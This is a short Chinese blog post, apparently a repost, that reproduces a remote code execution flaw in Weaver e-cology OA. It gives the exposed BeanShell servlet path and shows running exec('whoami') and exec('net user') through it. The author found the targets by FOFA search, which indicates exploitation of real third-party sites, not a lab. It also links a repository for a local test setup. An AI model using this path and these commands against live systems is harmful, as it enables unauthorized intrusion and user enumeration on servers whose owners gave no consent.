泛微e-cology OA 远程代码执行漏洞复现

复现过程:

直接使用FOFA搜索语法搜索,找了好久才找到含有漏洞的站点。

在根目录后面输入漏洞路径:  /weaver/bsh.servlet.BshServlet

进入BeanShell操作页面

 在Script中输入语句,结果会在Script Output中输出。

输入exec("whoami")  结果如图,可知这个系统是windows系统,查看/etc/passwd就不用想了

使用exec("net user")查看本机用户。

 

 

如果想本地搭建环境复现可见https://github.com/jas502n/e-cology

猜你喜欢

转载自www.cnblogs.com/flaray/p/11650528.html